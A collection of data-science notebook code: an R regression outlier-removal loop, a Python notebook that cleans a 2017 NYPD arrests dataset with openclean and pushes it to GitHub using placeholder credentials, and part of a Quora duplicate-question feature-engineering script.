gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] gplay_paid_data <- gplay_paid_data[c(-35, -37, -4),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] gplay_paid_data <- gplay_paid_data[c(-35, -37, -4),] gplay_paid_data <- gplay_paid_data[c(-34, -15, -7),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-6, -12, -29),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- 
gplay_paid_data[c(-5, -11, -27),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) panel.cor <- function(x,y,digits=2, prefix="", cex.cor,...) { usr <- par("usr"); on.exit(par(usr)) par(usr=c(0,1,0,1)) r <- abs(cor(x,y)) txt <- format(c(r,0.123456789),digits=digits)[1] txt <- paste0(prefix,txt) if(missing(cex.cor)) cex.cor <- 1.5/strwidth(txt) text(0.5,0.5,txt, cex=cex.cor*r) } # panel.cor 함수는 pairs 함수 사용할때 상관계수 크기에 따라 텍스트크기가 변하도록 해주는 사용자 정의 함수 # 우선 특정값의 평균을 나타내는 처음 10개변수의 설명변수와 class변수의 산점도 pairs(gplay_paid_data , lower.panel=function(x,y){ points(x,y); abline(lm(y ~ x), col='red') }, upper.panel = panel.cor ) gplay_paid_data <- gplay_paid_data %>% dplyr::select(-Installs) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) # panel.cor 함수는 pairs 함수 사용할때 상관계수 크기에 따라 텍스트크기가 변하도록 해주는 사용자 정의 함수 # 우선 특정값의 평균을 나타내는 처음 10개변수의 설명변수와 class변수의 산점도 pairs(gplay_paid_data , lower.panel=function(x,y){ points(x,y); abline(lm(y ~ x), col='red') }, upper.panel = panel.cor ) ```
github_jupyter
**Install openclean.** ``` pip install openclean-core ``` **Cloning the data from github repo.** ``` import os git_folder = 'NYC-Crime' if not os.path.isdir(git_folder): !git clone https://github.com/duketran1996/NYC-Crime.git else: %cd NYC-Crime/ !git pull %cd .. ``` **Important import. Run before executing the rest** ``` from openclean.cluster.knn import knn_clusters, knn_collision_clusters from openclean.function.similarity.base import SimilarityConstraint from openclean.function.similarity.text import LevenshteinDistance from openclean.function.token.ngram import NGrams from openclean.function.value.threshold import GreaterThan from openclean.operator.transform.update import update ``` **Data study: List number of columns.** ``` from openclean.pipeline import stream datafile = './NYC-Crime/sub-dataset/nypd_arrests_data_2017.csv' ds = stream(datafile) print('Schema\n------') for col in ds.columns: print(" '{}'".format(col)) print('\n{} rows.'.format(ds.count())) print("There are {} rows and {} columns in the dataset.".format(ds.count(),len(ds.columns))) ``` **Data study: Profile a sample of 10000 data to detect issues.** ``` from openclean.profiling.column import DefaultColumnProfiler profiles = ds.sample(n=10000, random_state=42).profile(default_profiler=DefaultColumnProfiler) profiles.stats() ``` **Data study: Perform a scan to check age group. No issues found.** ``` date = ds.distinct('AGE_GROUP') for i in date: print(i) ``` **Data study: Perform a scan to check date format. No issues found.** ``` date = ds.distinct('ARREST_DATE') import datetime def validate(date_text): try: datetime.datetime.strptime(date_text, '%m/%d/%Y') except ValueError: print(date_text) #raise ValueError("Incorrect data format, should be YYYY-MM-DD") for i in date: validate(i) ``` **Convert to data frame for fixing issues.** ``` fix = ds.to_df() ``` **Data Issues: In OFNS_DESC column, there are many repeated and miss spelling that needs to merge and fix. 
The impact with this change is later we would like to catergories offenses and have statistics on it.** ``` offense = ds.select('OFNS_DESC').distinct() clusters = knn_clusters( values=offense, sim=SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.7)), tokenizer=NGrams(n=4), minsize=2 ) for i in clusters: print(i) ``` **Data issues: Show RELATED OFFENSES spellings.** ``` offense = ds.select(['OFNS_DESC']).distinct() offense_val = [] for i in offense: if 'CRIMINAL MISCHIEF' in i: offense_val.append(i) print(i) ``` **Data fix: Change CRIMINAL MISCHIEF & RELATED OF to CRIMINAL MISCHIEF & RELATED OFFENSES** ``` offense_dict = { 'CRIMINAL MISCHIEF & RELATED OF': 'CRIMINAL MISCHIEF & RELATED OFFENSES' } fix = update(fix, columns='OFNS_DESC', func=offense_dict) ``` **Data fixed test: Test RELATED OFFENSES spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(offense_val)] assert all(check_fix['OFNS_DESC'] == 'CRIMINAL MISCHIEF & RELATED OFFENSES'), "RELATED OFFENSES spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show INTOXICATED spellings.** ``` offense = ds.select('OFNS_DESC').distinct() tox_val = [] for i in offense: if 'INTOXICATED' in i: tox_val.append(i) print(i) ``` **Data fix: Change INTOXICATED & IMPAIRED DRIVING, INTOXICATED/IMPAIRED DRIVING to INTOXICATED AND IMPAIRED DRIVING** ``` tox_dict = { 'INTOXICATED & IMPAIRED DRIVING': 'INTOXICATED AND IMPAIRED DRIVING', 'INTOXICATED/IMPAIRED DRIVING': 'INTOXICATED AND IMPAIRED DRIVING' } fix = update(fix, columns='OFNS_DESC', func=tox_dict) ``` **Data fixed test: Test INTOXICATED spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(['INTOXICATED AND IMPAIRED DRIVING'] + tox_val)] assert all(check_fix['OFNS_DESC'] == 'INTOXICATED AND IMPAIRED DRIVING'), "INTOXICATED spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data 
issues: Show POSSESSION OF STOLEN PROPERTY spellings.** ``` offense = ds.select('OFNS_DESC').distinct() stolen_val = [] for i in offense: if 'POSSESSION' in i: stolen_val.append(i) print(i) ``` **Data fix: Change POSSESSION OF STOLEN PROPERTY 5 to POSSESSION OF STOLEN PROPERTY** ``` tox_dict = { 'POSSESSION OF STOLEN PROPERTY 5': 'POSSESSION OF STOLEN PROPERTY' } fix = update(fix, columns='OFNS_DESC', func=tox_dict) ``` **Data fixed test: Test POSSESSION OF STOLEN PROPERTY 5 spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(stolen_val)] assert all(check_fix['OFNS_DESC'] == 'POSSESSION OF STOLEN PROPERTY'), "POSSESSION OF STOLEN PROPERTY spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show OTHER STATE LAWS (NON PENAL LAW) spellings.** ``` offense = ds.select('OFNS_DESC').distinct() penal_val = [] for i in offense: if 'NON PENAL' in i: penal_val.append(i) print(i) ``` **Data fix: Change OTHER STATE LAWS (NON PENAL LA to OTHER STATE LAWS (NON PENAL LAW)** ``` penal_dict = { 'OTHER STATE LAWS (NON PENAL LA' : 'OTHER STATE LAWS (NON PENAL LAW)' } fix = update(fix, columns='OFNS_DESC', func=penal_dict) ``` **Data fixed test: Test OTHER STATE LAWS (NON PENAL LAW) spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(penal_val)] assert all(check_fix['OFNS_DESC'] == 'OTHER STATE LAWS (NON PENAL LAW)'), "OTHER STATE LAWS (NON PENAL LAW) spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show CHILD ABANDONMENT/NON SUPPORT spellings.** ``` offense = ds.select(['OFNS_DESC']).distinct() child_val = [] for i in offense: if 'CHILD ABANDONMENT' in i: child_val.append(i) print(i) ``` **Data fix: Change CHILD ABANDONMENT/NON SUPPORT 1 to CHILD ABANDONMENT/NON SUPPORT** ``` child_dict = { 'CHILD ABANDONMENT/NON SUPPORT 1': 'CHILD ABANDONMENT/NON SUPPORT' } fix = update(fix, 
columns='OFNS_DESC', func=child_dict) ``` **Data fixed test: Test CHILD ABANDONMENT/NON SUPPORT spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(child_val)] assert all(check_fix['OFNS_DESC'] == 'CHILD ABANDONMENT/NON SUPPORT'), "CHILD ABANDONMENT/NON SUPPORT spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show ADMINISTRATIVE spellings.** ``` offense = ds.select('OFNS_DESC').distinct() administrative_val = [] for i in offense: if 'ADMINISTRATIVE' in i: administrative_val.append(i) print(i) ``` **Data fix: Change ADMINISTRATIVE CODES to ADMINISTRATIVE CODE** ``` ad_dict = { 'ADMINISTRATIVE CODES': 'ADMINISTRATIVE CODE', } fix = update(fix, columns='OFNS_DESC', func=ad_dict) ``` **Data fixed test: Test ADMINSTRATIVE spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(administrative_val)] assert all(check_fix['OFNS_DESC'] == 'ADMINISTRATIVE CODE'), "ADMINISTRATIVE spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: The borough of NYC that the arrest happen. 
The data K,M,B,Q,S is unclear to us.** ``` print(fix['ARREST_BORO'].unique()) ``` **Data fix: Change ambiguous abbreviation of column ARREST_BORO to full form.** ``` boro_dict = { 'B': 'Bronx', 'S': 'Staten Island', 'K': 'Brooklyn', 'M': 'Manhattan', 'Q': 'Queens', 'ARREST_BORO': 'ARREST_BORO' } fix = update(fix, columns='ARREST_BORO', func=boro_dict) ``` **Data fixed test: Test ARREST_BORO fixed data** ``` assert (sorted(fix['ARREST_BORO'].unique()) == sorted(boro_dict.values())), "ARREST_BORO is not fixed: " + fix['ARREST_BORO'].unique() print("Successfully fixed: " + fix['ARREST_BORO'].unique()) ``` **Data issues: The columns PERP_SEX and LAW_CAT_CD are also having values that is easier to read if written in full text instead of abbreviation.** ``` sex = ds.distinct('PERP_SEX') print(list(sex)) law_cat_cd = ds.distinct('LAW_CAT_CD') print(list(law_cat_cd)) ``` **Data fix: Change abbreviation of LAW_CAT_CD to long form.** ``` law_cat_cd_dict = { 'F': 'Felony', 'M': 'Misdemeanor', 'V': 'Violation', 'I': 'Traffic Infraction', '': 'Unknown', 'LAW_CAT_CD': 'LAW_CAT_CD' } fix = update(fix, columns='LAW_CAT_CD', func=law_cat_cd_dict) ``` **Data fixed test: Test LAW_CAT_CD fixed data** ``` assert (sorted(fix['LAW_CAT_CD'].unique()) == sorted(law_cat_cd_dict.values())), "LAW_CAT_CD is not fixed: " + fix['LAW_CAT_CD'].unique() print("Successfully fixed: " + fix['LAW_CAT_CD'].unique()) ``` **Data fix: Change abbreviation of PERP_SEX to long form.** ``` perp_sex_dict = { 'F': 'Female', 'M': 'Male', 'PERP_SEX': 'PERP_SEX' } fix = update(fix, columns='PERP_SEX', func=perp_sex_dict) ``` **Data fixed test: Test PERP_SEX fixed data** ``` assert (sorted(fix['PERP_SEX'].unique()) == sorted(perp_sex_dict.values())), "PERP_SEX is not fixed: " + fix['PERP_SEX'].unique() print("Successfully fixed: " + fix['PERP_SEX'].unique()) ``` **Data issues: There are unnecessary columns in our dataset that we don't care about such as X_COORD_CD and Y_COORD_CD which list midblock X and 
Y-coordinate for New York State Plane Coordinate System, Long Island Zone, NAD 83, units feet (FIPS 3104)**

```
display = ds.select(['X_COORD_CD','Y_COORD_CD']).to_df()
display.head()
```

**Data fix: Our solution is to drop the columns.**

```
fix = fix.drop(columns=['X_COORD_CD', 'Y_COORD_CD'])
```

**Data fixed test: Test X_COORD_CD and Y_COORD_CD dropped column**

```
# all() is required here: the test must only pass when BOTH columns are gone.
# any() would pass even if one of the two columns was still present.
assert (all(i not in fix.columns.values.tolist() for i in ['X_COORD_CD', 'Y_COORD_CD'])), "X_COORD_CD and Y_COORD_CD are not dropped"
print("Successfully dropped: " + str(fix.columns.values.tolist()))
```

**Data issues: The value ASIAN / PACIFIC ISLANDER is better fixed by removing the spaces around the / for easier comparison in later analysis.**

```
race = ds.distinct('PERP_RACE')
for i in race:
    print(i)
```

**Data fix: Remove space between ASIAN / PACIFIC ISLANDER.**

```
race_dict = {
    'ASIAN / PACIFIC ISLANDER': 'ASIAN/PACIFIC ISLANDER'
}

fix = update(fix, columns='PERP_RACE', func=race_dict)
```

**Data fixed test: Test PERP_RACE fixed data**

```
assert ('ASIAN / PACIFIC ISLANDER' not in fix['PERP_RACE'].unique()), "ASIAN / PACIFIC ISLANDER is not fixed"
print("Successfully fixed: " + fix['PERP_RACE'].unique())
```

**Data issues: Found new issues with PD_DESC. Some spellings are incorrect.
This also impacts as we want to catergorize the PD description to compare with the offense description.** ``` pd = ds.select('PD_DESC').distinct() clusters = knn_clusters( values=pd, sim=SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.9)), tokenizer=NGrams(n=4), minsize=2 ) for i in clusters: print(i) ``` **Only miss spelling one is considered to be fixed such as: ROBBERY,UNCLASSIFIED,OPEN AREAS, TRAFFIC,UNCLASSIFIED MISDEMEAN, ADM.CODE,UNCLASSIFIED VIOLATIO, TRAFFIC,UNCLASSIFIED INFRACTIO, NY STATE LAWS,UNCLASSIFIED FEL, IMPERSONATION 2, PUBLIC SERVAN, CRIMINAL DISPOSAL FIREARM 1 &, PROSTITUTION 3,PROMOTING BUSIN, CRIMINAL DISPOSAL FIREARM 1 &, GENERAL BUSINESS LAW,UNCLASSIFIED** ``` pd_desc = ds.select('PD_DESC').distinct() errors_list = ['ROBBERY,UNCLASSIFIED,OPEN AREA', 'TRAFFIC,UNCLASSIFIED MISDEMEAN', 'ADM.CODE,UNCLASSIFIED VIOLATIO', 'TRAFFIC,UNCLASSIFIED INFRACTIO', 'NY STATE LAWS,UNCLASSIFIED FEL', 'IMPERSONATION 2, PUBLIC SERVAN', 'CRIMINAL DISPOSAL FIREARM 1 &', 'PROSTITUTION 3,PROMOTING BUSIN', 'CRIMINAL DISPOSAL FIREARM 1 &', 'GENERAL BUSINESS LAW,UNCLASSIFIED'] for i in pd_desc: if any([e in i for e in errors_list]) : print(i) ``` **Data fix: Change spellings of ROBBERY,UNCLASSIFIED,OPEN AREAS, TRAFFIC,UNCLASSIFIED MISDEMEAN, ADM.CODE,UNCLASSIFIED VIOLATIO, TRAFFIC,UNCLASSIFIED INFRACTIO, NY STATE LAWS,UNCLASSIFIED FEL, IMPERSONATION 2, PUBLIC SERVAN, CRIMINAL DISPOSAL FIREARM 1 &** ``` mix_dict = { 'ROBBERY,UNCLASSIFIED,OPEN AREAS': 'ROBBERY,UNCLASSIFIED,OPEN AREA', 'TRAFFIC,UNCLASSIFIED MISDEMEAN': 'TRAFFIC,UNCLASSIFIED MISDEMEANOR', 'ADM.CODE,UNCLASSIFIED VIOLATIO': 'ADM.CODE,UNCLASSIFIED VIOLATION', 'TRAFFIC,UNCLASSIFIED INFRACTIO': 'TRAFFIC,UNCLASSIFIED INFRACTION', 'NY STATE LAWS,UNCLASSIFIED FEL': 'NY STATE LAWS,UNCLASSIFIED FELONY', 'IMPERSONATION 2, PUBLIC SERVAN': 'IMPERSONATION 2, PUBLIC SERVANT', 'CRIMINAL DISPOSAL FIREARM 1 &': 'CRIMINAL DISPOSAL FIREARM 1', 'PROSTITUTION 3,PROMOTING BUSIN': 'PROSTITUTION 3,PROMOTING 
BUSINESS', 'GENERAL BUSINESS LAW,UNCLASSIFIED': 'GENERAL BUSINESS LAW / UNCLASSIFIED' } fix = update(fix, columns='PD_DESC', func=mix_dict) ``` **Data fixed test: Test PD_DESC fixed data** ``` check_fix = fix[fix['PD_DESC'].str.contains('|'.join(mix_dict.values()))] assert (any(i not in check_fix['PD_DESC'].unique() for i in mix_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique() print("Successfully fixed: " + check_fix['PD_DESC'].unique()) ``` **Only miss spelling one is considered to be fixed such as: CONTROLLED SUBSTANCE, POSSESSI, CONTROLLED SUBSTANCE, INTENT T, CONTROLLED SUBSTANCE,POSSESS., and spaces between CONTROLLED SUBSTANCE, SALE** ``` pd_desc = ds.select('PD_DESC').distinct() for i in pd_desc: if 'CONTROLLED SUBSTANCE,' in i: print(i) ``` **Data fix: Change spacing in SALE and spelling to POSSESSION and INTENT** ``` control_dict = { 'CONTROLLED SUBSTANCE, POSSESSI': 'CONTROLLED SUBSTANCE, POSSESSION', 'CONTROLLED SUBSTANCE,POSSESS. OF PROCURSERS': 'CONTROLLED SUBSTANCE, POSSESSION OF PROCURSERS', 'CONTROLLED SUBSTANCE,POSSESS. 1': 'CONTROLLED SUBSTANCE, POSSESSION 1', 'CONTROLLED SUBSTANCE,POSSESS. 2': 'CONTROLLED SUBSTANCE, POSSESSION 2', 'CONTROLLED SUBSTANCE,POSSESS. 
3': 'CONTROLLED SUBSTANCE, POSSESSION 3',
    'CONTROLLED SUBSTANCE,INTENT TO SELL 3': 'CONTROLLED SUBSTANCE, INTENT TO SELL 3',
    'CONTROLLED SUBSTANCE,SALE 1': 'CONTROLLED SUBSTANCE, SALE 1',
    'CONTROLLED SUBSTANCE,SALE 2': 'CONTROLLED SUBSTANCE, SALE 2',
    'CONTROLLED SUBSTANCE,SALE 3': 'CONTROLLED SUBSTANCE, SALE 3',
}

fix = update(fix, columns='PD_DESC', func=control_dict)
```

**Data fixed test: Test PD_DESC fixed data**

```
check_fix = fix[fix['PD_DESC'].str.contains('CONTROLLED SUBSTANCE,')]
# all() is required: every misspelled key must be gone, not just one of them.
# (This also matches the IMPAIRED DRIVING test below, which already uses all().)
assert (all(i not in check_fix['PD_DESC'].unique() for i in control_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique()
print("Successfully fixed: " + check_fix['PD_DESC'].unique())
```

**Only fix DRUG spelling**

```
pd_desc = ds.select('PD_DESC').distinct()
for i in pd_desc:
    if 'IMPAIRED DRIVING' in i:
        print(i)
```

**Data fix: Fix DRUG spelling.**

```
impair_dict = {
    'IMPAIRED DRIVING, DRUGS': 'IMPAIRED DRIVING / DRUG',
    'IMPAIRED DRIVING,DRUG': 'IMPAIRED DRIVING / DRUG',
    'IMPAIRED DRIVING,ALCOHOL': 'IMPAIRED DRIVING / ALCOHOL'
}

fix = update(fix, columns='PD_DESC', func=impair_dict)
```

**Data fixed test: Test PD_DESC fixed data**

```
check_fix = fix[fix['PD_DESC'].str.contains('IMPAIRED DRIVING')]
assert (all(i not in check_fix['PD_DESC'].unique() for i in impair_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique()
print("Successfully fixed: " + check_fix['PD_DESC'].unique())
```

**Finalize data set: Save data clean file to csv file for analysis.**

```
import os

existing_file = './NYC-Crime/clean-dataset/nypd_arrest_data_clean_2017.csv'
# The target is a file, not a directory: os.path.isdir() was always False here,
# so the stale file was never removed. os.path.isfile() is the correct check.
if os.path.isfile(existing_file):
    !rm $existing_file

fix.to_csv(r'./NYC-Crime/clean-dataset/nypd_arrest_data_clean_2017.csv')
```

**Update clean dataset 2017 to Github repo.**

```
%cd NYC-Crime/
!git config --global user.email "email"
!git config --global user.name "username"
!git add .
!git commit -m 'fix: update clean dataset 2017' !git status ``` **Assign github credentials — replace `username` and `access_token` with your own values. Never commit a real personal access token into a shared notebook: anyone who can read it gains push access to the repository.** ``` !git remote add colab https://username:access_token@github.com/duketran1996/NYC-Crime.git ``` **Push file changes** ``` !git push -u colab main ``` **Remove Github repo folder** ``` %cd ../ !rm -r NYC-Crime ```
github_jupyter
``` import pandas as pd import numpy as np import nltk import multiprocessing import difflib import time import gc import xgboost as xgb import warnings warnings.filterwarnings('ignore') from collections import Counter from sklearn.metrics import log_loss from scipy.optimize import minimize from sklearn.cross_validation import train_test_split from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer from scipy.spatial.distance import cosine, correlation, canberra, chebyshev, minkowski, jaccard, euclidean from models_utils_xgb import * def get_test(): feats_src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/uncleaned/' feats_src2 = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/NER/' keras_q1 = np.load(feats_src2 + 'q1test_NER_128len.npy') keras_q2 = np.load(feats_src2 + 'q2test_NER_128len.npy') xgb_feats = pd.read_csv(feats_src + '/the_1owl/owl_test.csv') abhishek_feats = pd.read_csv(feats_src + 'abhishek/test_features.csv', encoding = 'ISO-8859-1').iloc[:, 2:] text_feats = pd.read_csv(feats_src + 'other_features/text_features_test.csv', encoding = 'ISO-8859-1') img_feats = pd.read_csv(feats_src + 'other_features/img_features_test.csv') srk_feats = pd.read_csv(feats_src + 'srk/SRK_grams_features_test.csv') mephisto_feats = pd.read_csv('../../data/features/lemmatized_fullclean/test_mephistopeheles_features.csv').iloc[:, 6:] turkewitz_feats = pd.read_csv('../../data/features/lemmatized_fullclean/test_turkewitz_features_fullcleanSTEMMED.csv') turkewitz_feats = turkewitz_feats[['q1_freq', 'q2_freq']] turkewitz_feats['freq_sum'] = turkewitz_feats.q1_freq + turkewitz_feats.q2_freq turkewitz_feats['freq_diff'] = turkewitz_feats.q1_freq - turkewitz_feats.q2_freq turkewitz_feats['freq_mult'] = turkewitz_feats.q1_freq * turkewitz_feats.q2_freq turkewitz_feats['freq_div'] = turkewitz_feats.q1_freq / turkewitz_feats.q2_freq xgb_feats.drop(['z_len1', 'z_len2', 'z_word_len1', 
'z_word_len2'], axis = 1, inplace = True) xgb_feats = xgb_feats.iloc[:, 5:] df = pd.concat([xgb_feats, abhishek_feats, text_feats, img_feats, turkewitz_feats, mephisto_feats], axis = 1) del xgb_feats, abhishek_feats, text_feats, img_feats, turkewitz_feats, mephisto_feats gc.collect() df = drop_duplicate_cols(df) keras_q1 = pd.DataFrame(keras_q1) keras_q2 = pd.DataFrame(keras_q2) keras_q1.columns = ['question1_{}'.format(i) for i in range(keras_q1.shape[1])] keras_q2.columns = ['question2_{}'.format(i) for i in range(keras_q2.shape[1])] X = pd.concat([keras_q1, keras_q2, df], axis = 1) colnames_list = X.columns.tolist() colnames_list[300] = 'len_char_q1_other' colnames_list[301] = 'len_char_q2_other' X.columns = colnames_list print('Test data shape:', X.shape) X = X.astype('float32') return X def predict_test(X_test, model_name): print('Predicting on test set.') gbm = xgb.Booster(model_file = 'saved_models/XGB/{}.txt'.format(model_name)) X_test = xgb.DMatrix(X_test) test_preds = gbm.predict(X_test) sub_src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/submissions/' sample_sub = pd.read_csv(sub_src + 'sample_submission.csv') sample_sub['is_duplicate'] = test_preds sample_sub.is_duplicate = sample_sub.is_duplicate.apply(transform) sample_sub.to_csv(sub_src + '{}.csv'.format(model_name), index = False) return def get_transformations_features(transformations_src, mode = 'train'): print('Adding features based on data transformations.') lsa10tr_3grams_q1 = np.load(transformations_src + '{}_lsa10_3grams.npy'.format(mode))[0] lsa10tr_3grams_q2 = np.load(transformations_src + '{}_lsa10_3grams.npy'.format(mode))[1] transforms_feats = pd.DataFrame() transforms_feats['cosine'] = [cosine(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['correlation'] = [correlation(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['jaccard'] = [jaccard(x, y) for (x,y) in zip(lsa10tr_3grams_q1, 
lsa10tr_3grams_q2)] transforms_feats['euclidean'] = [euclidean(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] return transforms_feats def get_doc2vec_features(doc2vec_src, mode = 'train'): print('Adding features based on Doc2Vec distances.') doc2vec_pre_q1 = np.load(doc2vec_src + '{}_q1_doc2vec_vectors_pretrained.npy'.format(mode)) doc2vec_pre_q2 = np.load(doc2vec_src + '{}_q2_doc2vec_vectors_pretrained.npy'.format(mode)) doc2vec_quora_q1 = np.load(doc2vec_src + '{}_q1_doc2vec_vectors_trainquora.npy'.format(mode)) doc2vec_quora_q2 = np.load(doc2vec_src + '{}_q2_doc2vec_vectors_trainquora.npy'.format(mode)) d2v_feats_pretrained = pd.DataFrame() d2v_feats_pretrained['cosine'] = [cosine(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['correlation'] = [correlation(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['jaccard'] = [jaccard(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['euclidean'] = [euclidean(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_quora = pd.DataFrame() d2v_feats_quora['cosine'] = [cosine(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['correlation'] = [correlation(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['jaccard'] = [jaccard(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['euclidean'] = [euclidean(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] return d2v_feats_pretrained, d2v_feats_quora def labelcount_encode(df2, cols): df = df2.copy() categorical_features = cols new_df = pd.DataFrame() for cat_feature in 
categorical_features: cat_feature_value_counts = df[cat_feature].value_counts() value_counts_list = cat_feature_value_counts.index.tolist() value_counts_range_rev = list(reversed(range(len(cat_feature_value_counts)))) # for ascending ordering value_counts_range = list(range(len(cat_feature_value_counts))) # for descending ordering labelcount_dict = dict(zip(value_counts_list, value_counts_range)) new_df[cat_feature] = df[cat_feature].map(labelcount_dict) return new_df def count_encode(df2, cols): df = df2.copy() categorical_features = cols new_df = pd.DataFrame() for i in categorical_features: new_df[i] = df[i].astype('object').replace(df[i].value_counts()) return new_df def bin_numerical(df2, cols, step): df = df2.copy() numerical_features = cols new_df = pd.DataFrame() for i in numerical_features: feature_range = np.arange(0, np.max(df[i]), step) new_df[i] = np.digitize(df[i], feature_range, right=True) return new_df def drop_duplicate_cols(df): dfc = df.iloc[0:10000,:] dfc = dfc.T.drop_duplicates().T duplicate_cols = sorted(list(set(df.columns).difference(set(dfc.columns)))) print('Dropping duplicate columns:', duplicate_cols) df.drop(duplicate_cols, axis = 1, inplace = True) print('Final shape:', df.shape) del dfc gc.collect() return df def get_new_feats(): print('Creating additional grouping features.') turkewitz_feats = pd.read_csv('/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/lemmatized_fullclean/test_turkewitz_features_fullcleanSTEMMED.csv') turkewitz_feats = turkewitz_feats[['q1_freq', 'q2_freq']] ff1 = turkewitz_feats.groupby(['q2_freq'])['q1_freq'].transform('sum') ff2 = turkewitz_feats.groupby(['q1_freq'])['q2_freq'].transform('sum') ff1 = ff1 / np.max(ff1) ff2 = ff2 / np.max(ff2) ff1m = turkewitz_feats.groupby(['q2_freq'])['q1_freq'].transform('mean') ff2m = turkewitz_feats.groupby(['q1_freq'])['q2_freq'].transform('mean') ff1m = ff1m / np.max(ff1m) ff2m = ff2m / np.max(ff2m) gr_feats = pd.DataFrame() 
